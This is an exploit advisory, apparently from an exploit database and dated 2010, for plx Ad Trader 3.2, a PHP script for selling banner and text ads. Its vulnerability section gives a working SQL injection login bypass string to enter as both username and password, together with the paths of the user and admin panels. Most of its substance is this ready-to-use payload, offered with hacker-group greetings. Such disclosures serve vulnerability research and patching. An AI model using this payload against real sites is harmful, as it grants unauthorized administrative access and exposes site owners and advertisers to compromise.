plx Ad Trader 3.2 - Authentication Bypass

EDB-ID:

15789

CVE:

N/A


Author:

R4dc0re

Type:

webapps


Platform:

PHP

Date:

2010-12-20


# Vendor or Software Link: http://www.plxwebdev.com/script/ad_trader/
# Category:WebApp
# Version: 3.2
# Price: 60 USD
# Contact: R4dc0re@yahoo.fr
# Website: www.1337db.com
# Greetings to: R0073r(1337db.com), L0rd CrusAd3r,Sid3^effects and to rest of the 1337db members
###################################################################################################

Submit Your Exploit at Submit@1337db.com

###################################################################################################
[Product Details]

This script will allow you to sell Banner and/or Text Ads on your web site. Ads will be rotated on
different zones as you set them up in your admin area.

You will be able in admin area set as many ad packages you wish and as many zones as well.
Each zone represent an area on a page where ads are rotated. For every visit you receive to your
site a different ad will be shown.

Advertisers will signup for free and once they are inside their advertiser area
they can Buy as many ads they want. They will be able to manage all aspects of their campaign ads.

[Vulnerability]

Authentication Bypass:

Use This string ' or 1=1 or ''='' on username and password to Enter the User panel and the Admin panel

User panel:
http://server/plxadtrader/
Admin Panel:
http://server/plxadtrader/admin/
###################################################################################################